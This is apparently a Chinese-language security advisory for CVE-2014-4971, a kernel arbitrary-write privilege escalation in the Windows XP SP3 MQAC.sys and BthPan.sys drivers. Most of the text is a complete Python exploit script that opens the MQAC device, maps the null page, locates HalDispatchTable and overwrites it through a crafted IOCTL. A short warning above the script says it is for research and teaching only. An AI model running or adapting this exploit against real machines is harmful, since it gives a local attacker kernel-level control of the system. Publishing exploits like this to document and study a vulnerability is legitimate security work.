多个微软产品任意内存写权限提升漏洞

多个微软产品任意内存写权限提升漏洞

发布日期：2014-07-18
更新日期：2014-07-23

受影响系统：
Microsoft Windows XP XP SP3
 Microsoft Bluetooth Personal Area Networking 5.1.2600.5512
 Microsoft MQ Access Control 5.1.0.1110
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 68764
 CVE(CAN) ID: CVE-2014-4971
 
微软 (Microsoft)，是一家总部位于美国的跨国电脑科技公司。
 
多个微软产品（例如Bluetooth Personal Area Networking、MQ Access Control）存在多个权限提升漏洞，这些漏洞源于MQAC.sys及BthPan.sys驱动程序内的错误，通过发送特制的IOCTL请求，本地攻击者可利用此漏洞注入内存到任意位置、写入数据、获取内核级别的权限。
 
<*来源：Matt Bergin
 
  链接：http://www.exploit-db.com/exploits/34112/
        http://xforce.iss.net/xforce/xfdb/94753
 *>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
#!/usr/bin/python2
      #
      # KL-001-2014-003 : Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation
      # Matt Bergin (KoreLogic / Smash the Stack)
      # CVE-2014-4971
      #
      from ctypes import *
      from struct import pack
      from os import getpid,system
      from sys import exit
      EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA
      GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle
      INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0

      # thanks to offsec for the concept
      # I re-wrote the code as to not fully insult them :)
      def getBase(name=None):
        retArray = c_ulong*1024
        ImageBase = retArray()
        callback = c_int(1024)
        cbNeeded = c_long()
        EnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded))
        for base in ImageBase:
                driverName = c_char_p("\x00"*1024)
                GetDeviceDriverBaseNameA(base,driverName,48)
                if (name):
                        if (driverName.value.lower() == name):
                                return base
                else:
                        return (base,driverName.value)
        return None

      handle = CreateFileA("\\\\.\\MQAC",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)
      print "[+] Handle \\\\.\\MQAC @ %s" % (handle)
      NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)
      buf = "\x50\x00\x00\x00"+"\x90"*0x400
      WriteProcessMemory(-1, 0x1, "\x90"*0x6000, 0x6000, byref(c_int(0)))
      WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0)))
      WriteProcessMemory(-1, 0x5000, "\xcc", 77, byref(c_int(0)))
      #Overwrite Pointer
      kBase,kVer = getBase()
      hKernel = LoadLibraryExA(kVer,0,1)
      HalDispatchTable = GetProcAddress(hKernel,"HalDispatchTable")
      HalDispatchTable -= hKernel
      HalDispatchTable += kBase
      HalDispatchTable += 0x4
      print "[+] Kernel @ %s, HalDispatchTable @ %s" % (hex(kBase),hex(HalDispatchTable))
      DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x1965020f,0x1,0x258,HalDispatchTable,0)
      print "[+] HalDispatchTable+0x4 overwritten"
      CloseHandle(handle)
      NtQueryIntervalProfile(c_ulong(2),byref(c_ulong()))
      exit(0)

建议：
--------------------------------------------------------------------------------
厂商补丁：
 
Microsoft
 ---------
 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
 
http://technet.microsoft.com/security/bulletin/

本文永久更新链接地址：